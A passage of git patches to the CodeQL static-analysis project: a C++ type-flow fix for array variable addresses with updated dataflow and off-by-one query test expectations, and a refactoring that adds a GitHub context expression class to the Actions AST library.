a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -1,4 +1,5 @@ | Dubious member name "operator BSTR" in summary model. | +| Dubious member name "operator HKEY" in summary model. | | Dubious member name "operator LPCSTR" in summary model. | | Dubious member name "operator LPSAFEARRAY" in summary model. | | Dubious member name "operator LPSTR" in summary model. | @@ -44,5 +45,3 @@ | Dubious signature "(size_type,const T &,const Allocator &)" in summary model. | | Dubious signature "(vector &&)" in summary model. | | Dubious signature "(vector &&,const Allocator &)" in summary model. | -| Dubious signature "operator HKEY" in summary model. | -| Dubious signature "operator=" in summary model. | From 9bcdfb6d019cf9f0099805649a1260c982a844ae Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 15:06:22 +0000 Subject: [PATCH 0933/1267] C++: VariableAddressInstructions with array types are not single-object types. --- .../lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll | 7 +++++-- .../dataflow/dataflow-tests/test-source-sink.expected | 1 + cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp | 2 +- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll index 41e30e2902b..df63b547da3 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll @@ -27,8 +27,11 @@ private module Input implements TypeFlowInput { } private predicate hasExactSingleType(Instruction i) { - // The address of a variable is always a single object - i instanceof VariableAddressInstruction + // The address of a variable is always a single object (unless it's an array) + exists(VariableAddressInstruction vai | + i = vai and + not vai.getResultType() instanceof ArrayType + ) or // A reference always points to a single object i.getResultLanguageType().hasUnspecifiedType(any(ReferenceType rt), false) diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected index 6a65ddf952c..fa141b614ea 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected @@ -326,6 +326,7 @@ irFlow | test.cpp:1069:9:1069:14 | call to source | test.cpp:1081:10:1081:10 | i | | test.cpp:1117:27:1117:34 | call to source | test.cpp:1117:27:1117:34 | call to source | | test.cpp:1132:11:1132:16 | call to source | test.cpp:1121:8:1121:8 | x | +| test.cpp:1138:17:1138:22 | call to source | test.cpp:1140:8:1140:18 | * ... | | true_upon_entry.cpp:9:11:9:16 | call to source | true_upon_entry.cpp:13:8:13:8 | x | | true_upon_entry.cpp:17:11:17:16 | call to source | true_upon_entry.cpp:21:8:21:8 | x | | true_upon_entry.cpp:27:9:27:14 | call to source | true_upon_entry.cpp:29:8:29:8 | x | diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp index 33c714a3139..b138bfb0fba 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp @@ -1137,5 +1137,5 @@ void test_uncertain_array(int n1, int n2) { int data[10]; *(data + 1) = source(); *data = 0; - sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 MISSING: ir + sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 ir } \ No newline at end of file From 0f49ba848de308fd7de80ee4d483e506c64e1925 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 16:04:46 +0000 Subject: [PATCH 0934/1267] C++: Accept test changes. Nothing exciting to see here. --- .../ConstantSizeArrayOffByOne.expected | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index fa7f625210d..eb0212153e8 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected @@ -21,7 +21,11 @@ edges | test.cpp:85:21:85:36 | buf | test.cpp:87:5:87:31 | access to array | provenance | Config | | test.cpp:85:21:85:36 | buf | test.cpp:88:5:88:27 | access to array | provenance | Config | | test.cpp:85:34:85:36 | buf | test.cpp:85:21:85:36 | buf | provenance | | +| test.cpp:92:9:92:11 | definition of arr | test.cpp:96:13:96:18 | access to array | provenance | Config | | test.cpp:96:13:96:15 | arr | test.cpp:96:13:96:18 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:111:17:111:22 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:115:35:115:40 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:119:17:119:22 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:111:17:111:22 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:115:35:115:40 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:119:17:119:22 | access to array | provenance | Config | @@ -31,40 +35,54 @@ edges | test.cpp:119:17:119:19 | arr | test.cpp:111:17:111:22 | access to array | provenance | Config | | test.cpp:119:17:119:19 | arr | test.cpp:115:35:115:40 | access to array | provenance | Config | | test.cpp:119:17:119:19 | arr | test.cpp:119:17:119:22 | access to array | provenance | Config | +| test.cpp:125:11:125:13 | definition of arr | test.cpp:128:9:128:14 | access to array | provenance | Config | | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | provenance | Config | | test.cpp:134:25:134:27 | arr | test.cpp:136:9:136:16 | ... += ... | provenance | Config | | test.cpp:136:9:136:16 | ... += ... | test.cpp:136:9:136:16 | ... += ... | provenance | | | test.cpp:136:9:136:16 | ... += ... | test.cpp:138:13:138:15 | arr | provenance | | +| test.cpp:142:10:142:13 | definition of asdf | test.cpp:143:18:143:21 | asdf | provenance | | | test.cpp:143:18:143:21 | asdf | test.cpp:134:25:134:27 | arr | provenance | | | test.cpp:143:18:143:21 | asdf | test.cpp:143:18:143:21 | asdf | provenance | | | test.cpp:146:26:146:26 | *p | test.cpp:147:4:147:9 | -- ... | provenance | | +| test.cpp:154:7:154:9 | definition of buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:14 | buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:18 | ... + ... | test.cpp:156:12:156:18 | ... + ... | provenance | | | test.cpp:156:12:156:18 | ... + ... | test.cpp:158:17:158:18 | *& ... | provenance | | | test.cpp:158:17:158:18 | *& ... | test.cpp:146:26:146:26 | *p | provenance | | +| test.cpp:217:19:217:24 | definition of buffer | test.cpp:218:16:218:28 | buffer | provenance | | | test.cpp:218:16:218:28 | buffer | test.cpp:220:5:220:11 | access to array | provenance | Config | | test.cpp:218:16:218:28 | buffer | test.cpp:221:5:221:11 | access to array | provenance | Config | | test.cpp:218:23:218:28 | buffer | test.cpp:218:16:218:28 | buffer | provenance | | +| test.cpp:228:10:228:14 | definition of array | test.cpp:229:17:229:29 | array | provenance | | | test.cpp:229:17:229:29 | array | test.cpp:231:5:231:10 | access to array | provenance | Config | | test.cpp:229:17:229:29 | array | test.cpp:232:5:232:10 | access to array | provenance | Config | | test.cpp:229:25:229:29 | array | test.cpp:229:17:229:29 | array | provenance | | | test.cpp:245:30:245:30 | p | test.cpp:261:27:261:30 | access to array | provenance | Config | | test.cpp:245:30:245:30 | p | test.cpp:261:27:261:30 | access to array | provenance | Config | +| test.cpp:273:19:273:25 | definition of buffer3 | test.cpp:274:14:274:20 | buffer3 | provenance | | | test.cpp:274:14:274:20 | buffer3 | test.cpp:245:30:245:30 | p | provenance | | | test.cpp:274:14:274:20 | buffer3 | test.cpp:274:14:274:20 | buffer3 | provenance | | | test.cpp:277:35:277:35 | p | test.cpp:278:14:278:14 | p | provenance | | | test.cpp:278:14:278:14 | p | test.cpp:245:30:245:30 | p | provenance | | +| test.cpp:282:19:282:25 | definition of buffer1 | test.cpp:283:19:283:25 | buffer1 | provenance | | | test.cpp:283:19:283:25 | buffer1 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:283:19:283:25 | buffer1 | test.cpp:283:19:283:25 | buffer1 | provenance | | +| test.cpp:285:19:285:25 | definition of buffer2 | test.cpp:286:19:286:25 | buffer2 | provenance | | | test.cpp:286:19:286:25 | buffer2 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:286:19:286:25 | buffer2 | test.cpp:286:19:286:25 | buffer2 | provenance | | +| test.cpp:288:19:288:25 | definition of buffer3 | test.cpp:289:19:289:25 | buffer3 | provenance | | | test.cpp:289:19:289:25 | buffer3 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:289:19:289:25 | buffer3 | test.cpp:289:19:289:25 | buffer3 | provenance | | | test.cpp:292:25:292:27 | arr | test.cpp:299:16:299:21 | access to array | provenance | Config | +| test.cpp:305:9:305:12 | definition of arr1 | test.cpp:306:20:306:23 | arr1 | provenance | | | test.cpp:306:20:306:23 | arr1 | test.cpp:292:25:292:27 | arr | provenance | | | test.cpp:306:20:306:23 | arr1 | test.cpp:306:20:306:23 | arr1 | provenance | | +| test.cpp:308:9:308:12 | definition of arr2 | test.cpp:309:20:309:23 | arr2 | provenance | | | test.cpp:309:20:309:23 | arr2 | test.cpp:292:25:292:27 | arr | provenance | | | test.cpp:309:20:309:23 | arr2 | test.cpp:309:20:309:23 | arr2 | provenance | | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:319:19:319:27 | ... + ... | provenance | Config | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:322:19:322:27 | ... + ... | provenance | Config | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:324:23:324:32 | ... + ... | provenance | Config | | test.cpp:319:13:319:27 | ... = ... | test.cpp:325:24:325:26 | end | provenance | | | test.cpp:319:19:319:22 | temp | test.cpp:319:19:319:27 | ... + ... | provenance | Config | | test.cpp:319:19:319:22 | temp | test.cpp:324:23:324:32 | ... + ... | provenance | Config | @@ -114,32 +132,39 @@ nodes | test.cpp:85:34:85:36 | buf | semmle.label | buf | | test.cpp:87:5:87:31 | access to array | semmle.label | access to array | | test.cpp:88:5:88:27 | access to array | semmle.label | access to array | +| test.cpp:92:9:92:11 | definition of arr | semmle.label | definition of arr | | test.cpp:96:13:96:15 | arr | semmle.label | arr | | test.cpp:96:13:96:18 | access to array | semmle.label | access to array | +| test.cpp:102:9:102:11 | definition of arr | semmle.label | definition of arr | | test.cpp:111:17:111:19 | arr | semmle.label | arr | | test.cpp:111:17:111:22 | access to array | semmle.label | access to array | | test.cpp:115:35:115:37 | arr | semmle.label | arr | | test.cpp:115:35:115:40 | access to array | semmle.label | access to array | | test.cpp:119:17:119:19 | arr | semmle.label | arr | | test.cpp:119:17:119:22 | access to array | semmle.label | access to array | +| test.cpp:125:11:125:13 | definition of arr | semmle.label | definition of arr | | test.cpp:128:9:128:11 | arr | semmle.label | arr | | test.cpp:128:9:128:14 | access to array | semmle.label | access to array | | test.cpp:134:25:134:27 | arr | semmle.label | arr | | test.cpp:136:9:136:16 | ... += ... | semmle.label | ... += ... | | test.cpp:136:9:136:16 | ... += ... | semmle.label | ... += ... | | test.cpp:138:13:138:15 | arr | semmle.label | arr | +| test.cpp:142:10:142:13 | definition of asdf | semmle.label | definition of asdf | | test.cpp:143:18:143:21 | asdf | semmle.label | asdf | | test.cpp:143:18:143:21 | asdf | semmle.label | asdf | | test.cpp:146:26:146:26 | *p | semmle.label | *p | | test.cpp:147:4:147:9 | -- ... | semmle.label | -- ... | +| test.cpp:154:7:154:9 | definition of buf | semmle.label | definition of buf | | test.cpp:156:12:156:14 | buf | semmle.label | buf | | test.cpp:156:12:156:18 | ... + ... | semmle.label | ... + ... | | test.cpp:156:12:156:18 | ... + ... | semmle.label | ... + ... | | test.cpp:158:17:158:18 | *& ... | semmle.label | *& ... | +| test.cpp:217:19:217:24 | definition of buffer | semmle.label | definition of buffer | | test.cpp:218:16:218:28 | buffer | semmle.label | buffer | | test.cpp:218:23:218:28 | buffer | semmle.label | buffer | | test.cpp:220:5:220:11 | access to array | semmle.label | access to array | | test.cpp:221:5:221:11 | access to array | semmle.label | access to array | +| test.cpp:228:10:228:14 | definition of array | semmle.label | definition of array | | test.cpp:229:17:229:29 | array | semmle.label | array | | test.cpp:229:25:229:29 | array | semmle.label | array | | test.cpp:231:5:231:10 | access to array | semmle.label | access to array | @@ -147,22 +172,29 @@ nodes | test.cpp:245:30:245:30 | p | semmle.label | p | | test.cpp:245:30:245:30 | p | semmle.label | p | | test.cpp:261:27:261:30 | access to array | semmle.label | access to array | +| test.cpp:273:19:273:25 | definition of buffer3 | semmle.label | definition of buffer3 | | test.cpp:274:14:274:20 | buffer3 | semmle.label | buffer3 | | test.cpp:274:14:274:20 | buffer3 | semmle.label | buffer3 | | test.cpp:277:35:277:35 | p | semmle.label | p | | test.cpp:278:14:278:14 | p | semmle.label | p | +| test.cpp:282:19:282:25 | definition of buffer1 | semmle.label | definition of buffer1 | | test.cpp:283:19:283:25 | buffer1 | semmle.label | buffer1 | | test.cpp:283:19:283:25 | buffer1 | semmle.label | buffer1 | +| test.cpp:285:19:285:25 | definition of buffer2 | semmle.label | definition of buffer2 | | test.cpp:286:19:286:25 | buffer2 | semmle.label | buffer2 | | test.cpp:286:19:286:25 | buffer2 | semmle.label | buffer2 | +| test.cpp:288:19:288:25 | definition of buffer3 | semmle.label | definition of buffer3 | | test.cpp:289:19:289:25 | buffer3 | semmle.label | buffer3 | | test.cpp:289:19:289:25 | buffer3 | semmle.label | buffer3 | | test.cpp:292:25:292:27 | arr | semmle.label | arr | | test.cpp:299:16:299:21 | access to array | semmle.label | access to array | +| test.cpp:305:9:305:12 | definition of arr1 | semmle.label | definition of arr1 | | test.cpp:306:20:306:23 | arr1 | semmle.label | arr1 | | test.cpp:306:20:306:23 | arr1 | semmle.label | arr1 | +| test.cpp:308:9:308:12 | definition of arr2 | semmle.label | definition of arr2 | | test.cpp:309:20:309:23 | arr2 | semmle.label | arr2 | | test.cpp:309:20:309:23 | arr2 | semmle.label | arr2 | +| test.cpp:314:10:314:13 | definition of temp | semmle.label | definition of temp | | test.cpp:319:13:319:27 | ... = ... | semmle.label | ... = ... | | test.cpp:319:19:319:22 | temp | semmle.label | temp | | test.cpp:319:19:319:27 | ... + ... | semmle.label | ... + ... | @@ -187,13 +219,23 @@ subpaths | test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | | test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | | test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:125:11:125:13 | definition of arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | | test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:142:10:142:13 | definition of asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | | test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:154:7:154:9 | definition of buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | | test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:217:19:217:24 | definition of buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | | test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:228:10:228:14 | definition of array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | | test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:285:19:285:25 | definition of buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | | test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:308:9:308:12 | definition of arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | | test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | From ef713ff13bbd387d51e073fff03efde41f814357 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:30:10 +0100 Subject: [PATCH 0935/1267] Extract GitHub context access expression into its own class --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 114 ++++++++++++++------- 2 files changed, 79 insertions(+), 37 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ad7bd67a18c..8c1925f3288 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -379,6 +379,8 @@ class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpression string getInnerExpression() { result = super.getInnerExpression() } } +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e5ad86a226c..e331eff9bd2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1540,25 +1540,27 @@ string getAJsonReferenceAccessPath(string s, int offset) { * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - string expression; - +class SimpleReferenceExpressionImpl extends ExpressionImpl { SimpleReferenceExpressionImpl() { - ( - expression = getASimpleReferenceExpression(this.getFullExpression(), _) - or - exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and - expression = this.getFullExpression() - ) + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) } - override string getExpression() { result = expression } + override string getExpression() { + ( + result = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + result = this.getFullExpression() + ) + } abstract string getFieldName(); abstract AstNodeImpl getTarget(); - override string toString() { result = expression } + override string toString() { result = this.getFullExpression() } } class JsonReferenceExpressionImpl extends ExpressionImpl { @@ -1597,6 +1599,44 @@ private string inputsCtxRegex() { private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `secrets` context. * e.g. `${{ secrets.FOO }}` @@ -1607,11 +1647,11 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { SecretsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(secretsCtxRegex()) and fieldName = expr.regexpCapture(secretsCtxRegex(), 1) @@ -1635,11 +1675,11 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { StepsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and @@ -1676,11 +1716,11 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { NeedsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(needsCtxRegex()) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -1720,11 +1760,11 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { JobsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and @@ -1752,8 +1792,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1779,11 +1819,11 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { EnvExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) @@ -1814,11 +1854,11 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { MatrixExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + 